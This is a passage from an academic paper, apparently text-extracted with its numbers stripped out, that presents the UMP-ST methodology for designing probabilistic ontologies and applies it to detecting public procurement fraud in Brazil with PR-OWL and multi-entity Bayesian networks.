development activities include: ( a) the specification activity, which describes why the ontology is being built, its purpose, etc.; ( b) the conceptualization activity, which describes and organizes the domain knowledge; ( c) the formalization activity, which evolves the conceptual model into a more formal model; and ( d) the implementation activity, which creates the desired ontology in the chosen language. as expected, these are the main activities addressed by the ontology engineering methodologies. the methodologies analyzed by gomez-perez, corcho & fernandez-lopez ( ) proposed or described most of these development activities, with the exception of cyc (reed & lenat, ), which only addresses the implementation activity and does not mention the others. post-development activities involve ( a) maintenance, which updates and fixes the ontology, and ( b) (re)use of the ontology being developed by other ontologies and carvalho et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. applications. these are also important activities; however, most of the methodologies only address them as a natural step during the ontology’s life cycle, which can be incremental, producing a sequence of evolving prototypes. none of the methodologies presented by gomez-perez, corcho & fernandez-lopez ( ) describes these activities. only the methontology and otkm methodologies propose some of these activities, but do not provide much detail. finally, ontology support activities include: ( ) knowledge acquisition, which extracts domain knowledge from subject matter experts (smes) or through some automatic process, called ontology learning; ( ) evaluation, in order to validate the ontology being created; ( ) integration, which is used when other ontologies are used; ( ) merging, which is important for creating a new ontology based on a mix of several other ontologies from the same domain; ( ) alignment, which involves mapping different concepts to/from the involved ontologies; ( ) documentation, which describe all activities completed and products generated for future reference; and ( ) configuration management, which controls the different versions generated for all ontologies and documentation. out of the seven methodologies compared by gomez-perez, corcho & fernandez-lopez ( ), five neither propose nor mention configuration management, merging, or alignment. the integration activity is proposed by six of them, but not described in detail. the knowledge acquisition and documentation activities are proposed by three and described by two, while the evaluation activity is proposed and described by two in detail. probability elicitation the literature on eliciting probabilities from experts has a long history (e.g., winkler, ; huber, ; wallsten & budescu, ). at the interface between cognitive science and bayesian probability theory, researchers have examined biases in unaided human judgment (e.g., kahneman, slovic & tversky, ) and have devised ways to counteract those biases (e.g., clemen & reilly, ; burgman et al., ). several authors have defined structured processes or protocols for eliciting probabilities from experts (e.g., clemen & reilly, ; garthwaite, kadane & o’hagan, ). there is general agreement on the steps in the elicitation process. the seven steps described by clemen & reilly ( ) are: understanding the problem; identifying and recruiting experts; motivating the experts; structuring and decomposition; probability and assessment training; probability elicitation and verification; and aggregating the probabilities. a recent comprehensive reference for probability elicitation is o’hagan et al. ( ). the advent of graphical probability models (pearl, ) has created the problem of eliciting the many probabilities needed to specify a graphical model containing dozens to hundreds of random variables (cf., druzdzel & van der gaag, ; renooij, ). mahoney & laskey ( ) defined a systematic process for constructing bayesian network models. their process considered elicitation of structural assumptions as well as probability distributions. it is an iterative and incremental process that produces a series of prototype models. the lessons learned from building each prototype model are used to identify requirements for refining the model during the next cycle. carvalho et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. uncertainty modeling process for semantic technology the process of creating and using a probabilistic ontology typically occurs in three stages: first is modeling the domain; next is populating the model with situation-specific information; and third is using the model and situation-specific information for reasoning. modeling a domain means constructing a representation of aspects of the domain for purposes of understanding, explaining, predicting, or simulating those aspects. for our purposes, the model represents the kinds of entities that can exist in the domain, their attributes, the relationships they can have to each other, the processes in which they can participate, and the rules that govern their behavior. it also includes uncertainties about all these aspects. there are many sources of uncertainty: e.g., causes may be non- deterministically related to their effects; events may be only indirectly observable through noisy channels; association of observations to the generating events may be unknown; phenomena in the domain may be subject to statistical fluctuation; the structure of and associations among domain entities may exhibit substantial variation; and/or the future behavior of domain entities may be imperfectly predictable (e.g., schum & starace, ; laskey & laskey, ; costa et al., ). once these and other relevant sources of uncertainty are captured in a domain model, the model can be applied to a specific situation by populating it with data about the situation. finally, the inference engine can be called upon to answer queries about the specific situation. unlike traditional semantic systems that can handle only deterministic queries, queries with a probabilistic ontology can return soft results. for example, consider a query about whether an inappropriate relationship exists between a procurement official and a bidder. a reasoning system for a standard ontology can return only procurements in which such a relationship can be proven, while a reasoner for a probabilistic ontology can return a probability that such a relationship exists. the ump-st is an iterative and incremental process, based on the up, for designing a probabilistic ontology. while up serves as the starting point, ump-st draws upon and is consistent with the ontology engineering and probability elicitation processes described in the previous sections, thus tailoring the up for probabilistic ontology design. as shown in fig. , the ump-st includes all phases of the up, but focuses only on the requirements, analysis & design, implementation, and test disciplines. the figure depicts the intensity of each discipline during the ump-st. like the up, ump-st is iterative and incremental. the basic idea behind iterative enhancement is to model the domain incrementally, allowing the modeler to take advantage of what is learned during earlier iterations of the model in designing and implementing later iterations. for this reason, each phase includes all four disciplines, but the emphasis shifts from requirements in the earlier phases toward implementation and test in the later phases. note that testing occurs even during the inception phase, prior to beginning the implementation phase. this is because it is usually possible to test some aspects of the model during the analysis & design carvalho et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure uncertainty modeling process for semantic technology (ump-st). stage prior to implementation. it is well known that early testing reduces risk, saves cost, and leads to better performance (incose, ). figure presents the probabilistic ontology modeling cycle (pomc). this cycle depicts the major outputs from each discipline and the natural order in which the outputs are produced. unlike the waterfall model (royce, ), the pomc cycles through the steps iteratively, using what is learned in one iteration to improve the result of the next. the arrows reflect the typical progression, but are not intended as hard constraints. indeed, it is possible to have interactions between any pair of disciplines. for instance, it is not uncommon to discover a problem in the rules defined in the analysis & design discipline during the activities in the test discipline. as a result, the engineer might go directly from test to analysis & design in order to correct the problem. in fig. , the requirements discipline (blue box) defines the goals that must be achieved by reasoning with the semantics provided by our model. usually, when designing a po, one wants to be able to automate a reasoning process that involves uncertainty. by goals, we mean the kinds of questions the user wants the system to be able to answer via the po reasoning. for instance, one of the main goals in the procurement fraud domain is to be able to answer with a certain degree of certainty whether a procurement presents any signs of fraud. however, this type of question is not straight-forward to answer. thus, the system will typically need to evaluate a set of more specific questions, or queries, in order to better assess the probability of having fraud. furthermore, in order to answer these more specific queries, the system will need some evidence. these goals, queries, and evidence comprise the requirements for the model being designed. the analysis & design discipline (green boxes) describes classes of entities, their attributes, how they relate to each other, and what rules apply to them in our domain. these definitions are independent of the language used to implement the model. carvalho et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure probabilistic ontology modeling cycle (pomc)—requirements in blue, analysis & design in green, implementation in red, and test in purple. the implementation discipline (red boxes) maps the design to a specific language that is both semantically rich and capable of representing uncertainty. this means encoding the classes, attributes, relationships and rules in the chosen language. for our case study, the mapping is to pr-owl (carvalho, laskey & costa, ; costa, laskey & laskey, ), but other semantically rich uncertainty representation languages could also be used (e.g., cozman & mauá, ). finally, the test discipline (purple box) is responsible for evaluating whether the model developed during the implementation discipline is behaving as expected from the rules defined during analysis & design and whether the results achieve the goals elicited during the requirements discipline. as noted previously, it is a good idea to test some of the rules and assumptions even before implementation. this is a crucial step to mitigate risk. early testing can identify and correct problems before significant resources have been spent developing a complex model that turns out to be inadequate. like several of the ontology engineering processes considered by gomez-perez, corcho & fernandez-lopez ( ), the ump-st does not cover ontology management, under the assumption that these activities can be imported from other frameworks. although the ump-st does not cover maintenance and reuse, its iterative nature supports incremental evolution of the developed ontology. of the ontology support activities described by gomez-perez, corcho & fernandez-lopez ( ), the ump-st process explicitly addresses only the test discipline, which is similar to the evaluation activity. by following the steps in the ump-st, the ontology designer will be generating the documentation needed in order to describe not only the final po, but also the whole process of building it. this carvalho et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. supports the documentation activity of gomez-perez, corcho & fernandez-lopez ( ). like most ontology engineering processes, the ump-st does not address the ontology support activities of integration, merging, and alignment. the primary focus of the ump-st is the ontology development activities. because it is based on the up, it uses a different nomenclature than gomez-perez, corcho & fernandez-lopez ( ), but there is a close resemblance: the specification activity is similar to the requirements discipline; the conceptualization and formalization activities are similar to the analysis & design discipline; and the implementation activity is similar to the implementation discipline. the major difference between the methodologies reviewed by gomez-perez, corcho & fernandez-lopez ( ) and the ump-st is the focus. while gomez-perez, corcho & fernandez-lopez ( ) focus on ways to build a glossary of terms, build taxonomies, and define concepts, properties, and deterministic rules the ump-st presents techniques to identify and specify probabilistic rules, define dependency relations between properties based on these rules, and quantify the strength of these relations as parameters of local probability distributions. thus, the ump-st extends other methodologies used for building ontologies, and should coexist with these methodologies. when creating deterministic parts of the ontology the user can follow existing methodologies proposed for standard ontology building. to incorporate uncertainty and therefore extend to a probabilistic ontology, the user can follow the steps defined in the ump-st process. similarly, the ump-st can and should coexist with processes for eliciting probabilities, such as those defined by clemen & reilly ( ) and o’hagan et al. ( ). the probabilistic ontology engineer should refer to these resources when defining a protocol for eliciting probabilities from experts. in the next two sections, the ump-st process and the pomc are illustrated through a case study in procurement fraud detection and prevention. the case study walks step-by-step through the activities that must be executed in each discipline in the pomc. the case study has been kept simple enough for clear exposition of pomc, while being complex enough to convey key issues that arise in real-world ontology engineering. implementation and plausible reasoning were carried out using the unbbayes probabilistic ontology environment (carvalho, ; matsumoto et al., ). preventing and detecting procurement fraud in brazil in brazil, the main law that details the regulation of the public procurement process is the federal law , / (public procurement law). the public procurement procedures are also mentioned in section xxi, article of the federal constitution. the public procurement law is applicable not only to the federal government, but also to the state and municipal governments. although it is meant to provide just general guidelines, it is so detailed that there is little room for the states and municipalities to further legislate (frizzo & oliveira, ). the public procurement law regulates public procurement procedures and contracts involving the government. carvalho et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. the public procurement law defines three main procurement procedures: invitation to tender, which is a simpler and faster procedure where at least three competitors are invited to participate in the tender based on the request for proposals (rfp), which is not required to be advertised in the press; price survey, which requires the competitors to be previously registered before the public tender and requires a broader advertising of the rfp in the newspaper and official press; and competition, which is the most complex and longest procedure, allowing participation of all companies that meet the qualification criteria on the first day of the procedure and requiring more general advertising of the rfp as the price survey. in addition, law , / created the reverse auction, which involves alternative bids from the participating companies in the competitive phase, before the qualification documents are analyzed. nowadays, the most common procedure for the acquisition of common goods and services is the electronic reverse auction, which is the same as the reverse auction, but the procedure happens in an electronic system. its rfp must also be advertised in the official press as well as through the internet. the criteria for selecting the best proposal are defined in the rfp by the regulated agency. there are three main types of rules that must be followed: best price, where the company that presents the best bid and meets the minimum requirements is awarded the contract; best technique, where the company with the best technical solutions wins regardless of price; and a mix of the two, where scores are given for both price and technique and the company with the highest joint score wins. frizzo & oliveira ( ) provide additional detail on thresholds for determining whether a contract is subject to the public procurement law, freedom to choose which procedure to use, changes to an existing contract, and other aspects of the public procurement process in brazil. the procurement process presents many opportunities for corruption. although laws attempt to ensure a competitive and fair process, perpetrators find ways to turn the process to their advantage while appearing to be legitimate. to aid in detecting and deterring such perversions of the procurement process, a specialist, who helped in this work, has didactically structured different kinds of procurement fraud encountered by the brazilian office of the comptroller general (cgu, controladoria-geral da união, in portuguese) over the years. these different fraud types are characterized by criteria, such as business owners working as a front for the company or use of accounting indices that are not commonly employed. indicators have been established to help identify cases of each of these fraud types. for instance, one principle that must be followed in public procurement is that of competition. a public procurement should attempt to ensure broad participation in the bidding process by limiting requirements on bidders to what is necessary to guarantee adequate execution of the contract. nevertheless, it is common to have a fake competition in which different bidders are, in fact, owned by the same person. this is usually done by having someone act as a front for the enterprise. an indicator that a bidder may be a front is that the listed owner has little or no education. thus, an uneducated owner is a red flag suggesting that there may be a problem with the procurement. carvalho et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. gregorini ( ) identified a number of red flags that can be considered evidence of fraud. these include: concentration of power in the hands of a few people; rapid growth in concentration of goods and services contracted from a single company; competition restriction; transfer of funds to a non governmental organization (ngo) close to elections; and others. while these factors are evidence of potential irregularities, they are not definitive indicators. a list of more serious and determinant conditions is presented by flores ( ). these include: choosing directors based on a political agenda; negotiating contracts in order to reserve money for an election campaign; negotiating contracts in order to favor friends and family; bribery in order to obtain certain privileges; and providing inside information. a more formal definition of different types of fraud found in brazil is presented by oliveira ( ). he presents three main groups of fraud, based on recent scandals in brazil: frauds initiated by passive agents; frauds initiated by active agents; and frauds that represent collusion. the first is when an agent from the public administration, acting in his public function, favors someone or himself by performing illicit actions (e.g., purchasing products that were never used, falsification of documents and signatures, favoring friends and family). the second is when an active agent, a person or a company, outside the public administration tries to corrupt an agent that works in the public administration or does something illegal in order to cheat the procurement process (e.g., acting as a front for a company, delivering contraband products, giving money to civil servants in order to favor a specific company). finally, the third is when there is some type of collusion between companies participating in the procurement process or even between passive and active agents (e.g., delivering and accepting just part of the goods purchased, paying before receiving the merchandise, overpricing goods and services, directing and favoring a specific company in exchange for some financial compensation). the types of fraud presented by oliveira ( ), although focused on the brazilian context, are consistent with more recent work from dhurandhar et al. ( b). this work, which presents a more general fraud taxonomy related to procurement fraud, was registered as a patent in (dhurandhar et al., a). while oliveira talks about passive and active agents, dhurandhar et al. talks about fraud by employees and fraud by vendors, respectively. however, these fraud definitions do have a few differences. for example, while dhurandhar et al. differentiate collusion among vendors and collusion between employee and vendors, oliveira classifies both as simply collusion. formalizing knowledge about fraud in a computable form can lead to automated support for fraud detection and prevention. specifically, analysts at the cgu must sift through vast amounts of information related to a large number of procurements. automated support can improve analyst productivity by highlighting the most important cases and the most relevant supporting information. the ultimate goal of the procurement fraud probabilistic ontology is to structure the specialist’s knowledge to enable automated reasoning from indicators to potential fraud types. such an automated system is intended to support specialists and to help train new specialists, but not to replace them. automated support for this task requires a semantically rich representation that supports uncertainty management. carvalho et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. as a case study, carvalho ( ) developed a proof-of-concept probabilistic ontology covering part of the procurement fraud domain. this paper uses a portion of this case study to illustrate how the pomc can support the creation of a po. the full implementation and code for the case study is presented in carvalho ( ) and is provided as supplemental information. this proof-of-concept implementation represents only a fragment of the specialist’s knowledge of the procurement fraud domain. the plan is eventually to extend this po to a full representation of the specialist’s knowledge. ump-st for procurement fraud this section describes in detail the four disciplines in the ump-st process and their application to the procurement fraud case study. to facilitate the understanding of each discipline, we alternate between describing the discipline and illustrating its application to the public procurement fraud detection and prevention use case. requirements the pomc begins with the requirements discipline (r. in fig. ). the requirements discipline defines the objectives that must be achieved by representing and reasoning with a computable representation of domain semantics. for this discipline, it is important to define the questions that the model is expected to answer, i.e., the queries to be posed to the system being designed. for each question, a set of information items that might help answer the question (evidence) must be defined. requirements can be categorized as functional and non-functional (wiegers, ; sommerville, ). functional requirements concern outputs the system should provide, features it should have, how it should behave, etc. in our case, functional requirements relate to the goals, queries, and evidence that pertain to our domain of reasoning. non-functional requirements, on the other hand, address criteria relating to performance of the system as a whole. for instance, in our use case a non-functional requirement could be that a given query has to be answered in less than a minute. another example is that the posterior probability given as an answer to a given query has to be either exact or an approximation with an error bound of ± . %. non-functional requirements are typically not specific to probabilistic ontology development. we therefore focus here on how to develop functional requirements for our use case. we focus on a subset of our procurement use case to illustrate how a requirement is carried through the po development cycle until it is eventually implemented and tested. to understand the requirements associated with this subset, we first have to explain some of the problems encountered when dealing with public procurements. one of the principles established by law no. , / is equality among bidders. this principle prohibits the procurement agent from discriminating among potential suppliers. however, if the procurement agent is related to the bidder, he/she might feed information or define new requirements for the procurement in a way that favors the bidder. another problem arises because public procurement is quite complex and may involve large sums of money. therefore, members forming the committee for a procurement must both be well prepared, and have a clean history with no criminal or administrative carvalho et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. /supplemental-information http://dx.doi.org/ . /peerj-cs. /supplemental-information http://dx.doi.org/ . /peerj-cs. convictions. this latter requirement is necessary to satisfy the ethical guidelines that federal, state, municipal and district government employees must follow. the above considerations give rise to the following set of goals, queries, and evidence: . goal: identify whether a given procurement violates fair competition policy (i.e., evidence suggests further investigation and/or auditing is warranted); (a) query: is there any relation between the committee and the enterprises that participated in the procurement? i. evidence: committee member and responsible person of an enterprise are related (mother, father, brother, or sister); ii. evidence: committee member and responsible person of an enterprise live at the same address. . goal: identify whether the committee for a given procurement has improper composition. (a) query: is there any member of committee who does not have a clean history? i. evidence: committee member has criminal history; ii. evidence: committee member has been subject to administrative investigation. (b) query: is there any relation between members of the committee and the enterprises that participated in previous procurements? i. evidence: member and responsible person of an enterprise are relatives (mother, father, brother, or sister); ii. evidence: member and responsible person of an enterprise live at the same address. in defining requirements, the availability of evidence must be considered. for example, information about whether persons are related might be drawn from a social network database; evidence about criminal history might come from a police database; an evidence about cohabitation might be drawn from an address database. one important role for semantic technology is to support interoperability among these various data sources and the fraud detection model. another important aspect of the requirements discipline is defining traceability of requirements. according to gotel & finkelstein ( ), ‘‘requirements traceability refers to the ability to describe and follow the life of a requirement, in both the forward and backward directions.’’ a common tool for traceability is a specification tree, in which each requirement is linked to its ‘‘parent’’ requirement. a specification tree for the requirements for our procurement model is shown in fig. . in this hierarchy, each item of evidence is linked to a query it supports, which in turn is linked to its higher level goal. this linkage supports requirements traceability. in addition to the hierarchical decomposition of the specification tree, requirements should also be linked to work products of other disciplines, such as the rules in the analysis & design discipline, or goals, queries, and evidence elicited in the requirements discipline. these links provide traceability that is essential to validation and management of change. subsequent sections show how ump-st supports requirements tracing. carvalho et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. every brazilian citizen is required to file tax information, even if only to state that his or her income is below a certain amount and no taxes are owed. figure specification tree for procurement model requirements. analysis & design once we have defined our goals and described how to achieve them, it is time to start modeling the entities, their attributes, relationships, and rules to make that happen. this is the purpose of the analysis & design discipline. the major objective of this discipline is to define the semantics of the model. in fact, much of the semantics can be defined using traditional ontologies, including the deterministic rules that the concepts described in our model must obey. the focus of this paper is on representing uncertain aspects of the domain. information on defining traditional ontologies can be found in allemang & hendler ( ) and gomez-perez, corcho & fernandez-lopez ( ). the first step in defining the domain model is to define the classes and relationships that are important to represent for the procurement fraud detection problem (ad. in fig. ). for our case study, we use the unified modeling language (uml) (rumbaugh, jacobson & booch, ) for this purpose. analysis & design also includes developing rules (ad. in fig. ). because uml is insufficiently expressive to represent complex rule definitions, we record the deterministic rules separately for later incorporation into the pr-owl probabilistic ontology. while experienced ontology engineers might prefer to define classes, relationships and rules directly in owl, we chose uml for its popularity, understandability, ease of communication with domain experts, and widely available and usable software tools. we see uml-style diagrams as a way to capture knowledge about classes and relationships that could be automatically translated into an owl ontology or pr-owl probabilistic ontology (cf., gasevic et al. ( )). figure depicts a simplified model of the classes and relationships in the procurement fraud domain. a person has a name, a mother and a father (also person). every person has a unique identification that in brazil is called cpf. a person also has an education and livesat a certain address. in addition, everyone is obliged to file his/her taxinfo every year, including his/her annualincome. these entities can be grouped as personal information. a publicservant is a person who worksfor a publicagency, which is a government agency. every public procurement is owed by a publicagency, has a committee formed by a group of publicservants, and has a carvalho et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure entities, their attributes, and relations for the procurement model. group of participants, which are enterprises. one of these will be the winner of the procurement. eventually, the winner of the procurement will receive a contract of some value with the publicagency owner of the procurement. the entities just described can be grouped as procurement information. every enterprise has at least one person that is responsible for its legal acts. an enterprise also has an identification number, the general list of contributors cgc, which can be used to inform that this enterprise is suspended from procuring with the public administration, issuspended. these are grouped as the enterprise information. we also have adminstrativeinvestigation, which has information about investigations that involve one or more publicserver. its finalreport, the judgmentadministrativereport, contains information about the penalty applied, if any. these entities form the administrative judgment information. finally we have the criminal judgment information group that describes the criminalinvestigation that involves a person, with its finalreport, the judgmentcriminalreport, which has information about the verdict. notice that just a subset of this uml model is of interest to us in this paper, since we are dealing with just a subset of the requirements presented in carvalho ( ). carvalho et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. in addition to the cardinality and uniqueness rules defined above for the entities depicted in fig. , the ad. step in fig. includes specifying probabilistic rules to address the requirements defined in the r. step. these include: . if a member of the committee has a relative (mother, father, brother, or sister) responsible for a bidder in the procurement, then it is more likely that a relation exists between the committee and the enterprises, which inhibits competition. . if a member of the committee lives at the same address as a person responsible for a bidder in the procurement, then it is more likely that a relation exists between the committee and the enterprises, which lowers competition. . if or , then the procurement is more likely to violate policy for fair competition. . if a member of the committee has been convicted of a crime or has been penalized administratively, then he/she does not have a clean history. if he/she was recently investigated, then it is likely that he/she does not have a clean history. . if the relation defined in and is found in previous procurements, then it is more likely that there will be a relation between this committee and future bidders. . if or , then it is more likely that the committee violates policy for proper committee composition. typically the probabilistic rules are described initially using qualitative likelihood statements. implementing a probabilistic ontology requires specifying numerical probabilities. probability values can be elicited from domain experts (e.g., druzdzel & van der gaag, ; o’hagan et al., ) or learned from observation. the growing literature in statistical relational learning (e.g., getoor & taskar, ) provides a wealth of methods for learning semantically rich probability models from observations. in the analysis & design stage, information is identified for specifying the probability distributions (expert judgment and/or data sources). this information is encoded into the target representation during the implementation stage. the traceability matrix of table depicts how the probabilistic rules defined above are traced to the goals, queries and evidence items defined in the requirements discipline. this traceability matrix is an important tool to help designers to ensure that all requirements have been covered. it also supports maintainability by helping ontology engineers to identify how requirements are affected by changes in the model. it is also important at this stage to trace each of the rules to the source of information used to define the rule (e.g., notes from interview with expert, training manual, policy document, data source). another important step in the analysis & design discipline is to form natural groups of entities, rules, and dependencies (ad. in fig. ). this step facilitates the implementation discipline. the more complex the domain, the more important is the grouping activity. as shown in fig. , even in this simplified example there are five natural groups: ( ) personal information; ( ) procurement information; ( ) enterprise information; ( ) administrative judgment information; and ( ) criminal judgment information. carvalho et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table traceability matrix relating rules to requirements. rule. rule. rule. rule. rule. rule. rq. x x x rq. .a x x rq. .a.i x rq. .a.ii x rq. x x x rq. .a x rq. .a.i x rq. .a.ii x rq. .b x rq. .b.i x rq. .b.ii x implementation once the analysis & design step has been completed, the next step is to implement the model in a specific language. how this discipline is carried out depends on the specific language being used. our case study was developed using the pr-owl probabilistic ontology language (costa, ; carvalho, ). pr-owl (pronounced ‘‘prowl’’) adds new definitions to owl to allow the modeler to incorporate probabilistic knowledge into an owl ontology. this section shows how to use pr-owl to express uncertainty about the procurement fraud domain. pr-owl uses multi-entity bayesian networks (mebn) (laskey, ) to express uncertainty about properties and/or relations defined on owl classes. a probability model is defined as a set of mebn fragments (mfrags), where each mfrag expresses uncertainty about a small number of attributes of and/or relationships among entities. a set of properly defined mfrags taken together comprise a mebn theory (mtheory), which can express a joint probability distribution over complex situations involving many entities in the domain. unlike most expressive probabilistic languages that assume the domain is finite (e.g., heckerman, meek & koller, ), an mtheory can express knowledge about an unbounded or even infinite set of entities. a properly defined pr-owl model expresses an mtheory, and thus expresses a global joint distribution over the random variables mentioned in the theory. for more detailed explanations on the key features of mebn logic, the reader should refer to laskey ( ). on a typical usage of a pr-owl probabilistic ontology, during execution time (e.g., in response to a query) a logical reasoning process would instantiate the mfrags that are needed to respond to the query. the result of this process is a situation-specific bayesian network (ssbn), which is a minimal bayesian network sufficient to obtain the posterior distribution for a set of target random variable instances given a set of finding random variable instances. in a pr-owl probabilistic ontology, the entity types correspond to owl classes, the attributes correspond to owl properties, and the relationships correspond to owl relations. thus, pr-owl allows the ontology designer to specify probability distributions to express uncertainty about properties and relations in an owl ontology. carvalho et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure pr-owl entities for the procurement domain. the expressive power of mebn/pr-owl makes it an attractive choice for implementing probabilistic ontologies in complex domains. its compatibility with owl, a widely used ontology language, allows for the expression of uncertainty in existing owl ontologies, and for integrating pr-owl probabilistic ontologies with other ontologies expressed in owl. these are the primary reasons for the choice of mebn/pr-owl as the implementation language in our case study. the first step in defining a pr-owl probabilistic ontology for the procurement fraud domain is to represent the entities, attributes and relations of fig. as owl classes, properties and relations (i. in fig. ). our proof-of-concept made a few simplifications to the representation depicted in fig. . for example, we removed the publicservant entity and connected person directly to publicagency with the workfor relationship. as another simplification, we assumed that every person and enterprise instance is uniquely identified by its name, so there was no need to represent the cpf and cgc entities. fig. presents the entities as entered into our pr-owl ontology implemented in unbbayes (carvalho et al., ). after defining the entities, we consider characteristics that may be uncertain. an uncertain attribute of an entity or an uncertain relationship among entities is represented in mebn by a random variable (rv). for example, the rv livesat(person) corresponds carvalho et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure creating a rv in pr-owl plug-in from its owl property by drag-and-drop. to the relation livesat from fig. . as it is a functional relation, livesat relates a person to an address. hence, the possible values (or states) of this rv are instances of address. to define a probability distribution for an uncertain attribute or relationship, we must declare it as resident in some mfrag. this occurs as part of i. in fig. ; its probability distribution will be defined later as part of i. . for example, fig. shows how to define uncertainty about whether two persons are related. this is accomplished by selecting the owl property isrelated and dragging the property and dropping it inside the personalinfo mfrag. the mfrags are language specific groupings formed out of the grouping performed during the analysis & design discipline (ad. from fig. ). the yellow oval on the right-hand side of fig. shows the rv defined by the pr-owl plug-in for unbbayes (matsumoto, ) to represent uncertainty about whether persons are related. in the background what actually happens is that an instance of the domainresidentnode class, which is a random variable that has its probability distribution defined in the current mfrag, is created. in addition, an assertion is also added saying that this instance definesuncertaintyof the owl property isrelated. once rvs have been created for all uncertain attributes and relationships, probabilistic dependencies can be identified by analyzing how the rvs influence each other. the rules defined as part of the analysis & design discipline describe probabilistic relationships that are formally defined as part of the implementation discipline. for example, rule indicates that there is a dependence between hascriminalhistory(person), hasadministrativehistory(person), and hascleanhistory(person). carvalho et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. a more sophisticated model for deciding whether to do further investigation or change the committee would define a utility function and use expected utility to make the decision. future versions of unbbayes will support multi-entity influence diagrams (costa, ) for modeling decision-making under uncertainty. maybe a better name for this node would be istrustworthy. nevertheless, the idea is that if someone was investigated and/or convicted then he might not be a good candidate for being part of a procurement committee. figure part of the probabilistic ontology for fraud detection and prevention in public procurements. for this paper, we focus on the judgment history, improper committee, and improper procurement mfrags. figure shows a partial mtheory consisting of these three mfrags. details on the complete pr-owl mtheory can be found in carvalho ( ) and are provided as supplemental information. each mfrag defines local probability distributions (lpds) for its resident rvs, shown as yellow ovals. these distributions are conditioned on satisfaction of constraints expressed by context rvs, shown as green pentagons. the local distributions may depend on the values of input rvs, shown as gray trapezoids, whose distributions are defined in the mfrags in which they are resident. the two main goals described in our requirements are defined in the improper procurement and improper committee mfrags. the judgment history mfrag has rvs representing the judgment (criminal and administrative) history of a person. there are three lpds defined in the judgment history mfrag: ( ) a probability that a person has a criminal history; ( ) a probability that a person has an administrative history, and ( ) a probability that a person has a clean history given whether or not that person has a criminal and/or an administrative history. this latter probability is lowest if he/she has never been investigated, higher if he/she has been investigated, and extremely high if he/she has been convicted. carvalho et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. /supplemental-information http://dx.doi.org/ . /peerj-cs. the improper committee mfrag contains the resident rv hasimpropercommittee (procurement), defined under the context constraints that procurement is an entity of type procurement, member is an entity of type person, and member is a member of the committee for procurement. the assumptions behind the lpd defined in this mfrag are that: if any committee member of this procurement does not have a clean history, or if any committee member was related to previous participants, then the committee is more likely to be improper; and that if these things happen together, the probability of a improper committee is even higher. the improper procurement mfrag has the resident rv isimproperprocurement (procurement), created in the same way as the isrelated rv inside the personalinfo mfrag explained previously. the assumptions behind the lpd defined in this mfrag are that: if the competition is compromised, or if any owner of a participating enterprise owns a suspended enterprise, or if committee of this procurement is improper, then the procurement is more likely to be improper; and that if these things happen together, the probability of having an improper procurement is even higher. the final step in constructing a probabilistic ontology in unbbayes is to define the lpds for all resident rvs (i. in fig. ). figure shows the lpd for the resident node isimproperprocurement(procurement), which is the main question we need to answer in order to achieve one of the main goals in our model. this distribution follows the unbbayes-mebn grammar for defining lpds (carvalho, ; carvalho et al., ). the distribution for isimproperprocurement depends on the values of the parent rvs iscompetitioncompromised, hasimpropercommittee and ownssuspendedenterprise. the lpd is defined through a series of if-then-else statements giving the probability of ownssuspendedenterprise given each combination of truth-values of its parents. in this example, if all three parent rvs are true, then ownssuspendedenterprise has probability . ; if any two parents are true, then ownssuspendedenterprise has probability . ; if just one parent is true, then ownssuspendedenterprise has probability . ; if none of the parents is true then ownssuspendedenterprise has probability . . the probability values shown here were defined in collaboration with the specialist who supported the case study. in general, probability values for the mfrags are defined through some combination of expert elicitation and learning from data. however, in the po described in this paper, all lpds were defined based on the experience of the smes from cgu, since there is not enough structured data to learn the distributions automatically. it is important to ensure traceability between the mfrags defined in the implementation stage and the rules defined in the analysis & design stage. a traceability matrix similar to table was developed to trace mfrags to rules. this mapping, along with the mapping of the rules to the requirements as documented in table , enables the probabilistic relationships expressed in the mfrags to be traced back to the requirements defined in the goals stage. test as with any engineering methodology, test (t. in fig. ) plays an essential role in ump-st. as laskey & mahoney ( ) point out, test should do more than showcase the model and carvalho et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure lpd for node isimproperprocurement(procurement). demonstrate that it works as envisioned. another important goal of the test discipline is to find flaws and areas for improvement in the model. the literature distinguishes two types of evaluation, verification and validation (adelman, ). verification is concerned with establishing that ‘‘the system was built right,’’ i.e., that the system elements conform to their defined performance specifications. validation is concerned with establishing that the ‘‘right system was built,’’ i.e., that it achieves its intended use in its operational environment. for example, in the model we have been describing in this section we would like to verify that the system satisfies the non-functional requirements developed during the requirements stage as described above, e.g., that the queries covered by the requirement are answered in less than a minute and that the posterior probability given as an answer to a given query is either exact or has an approximation with an error bound of . % or less. laskey & mahoney ( ) present three types of evaluation: elicitation review, importance analysis, and case-based evaluation. elicitation review includes reviewing the model documentation, analyzing whether all the requirements were addressed in the final model, making sure all the rules 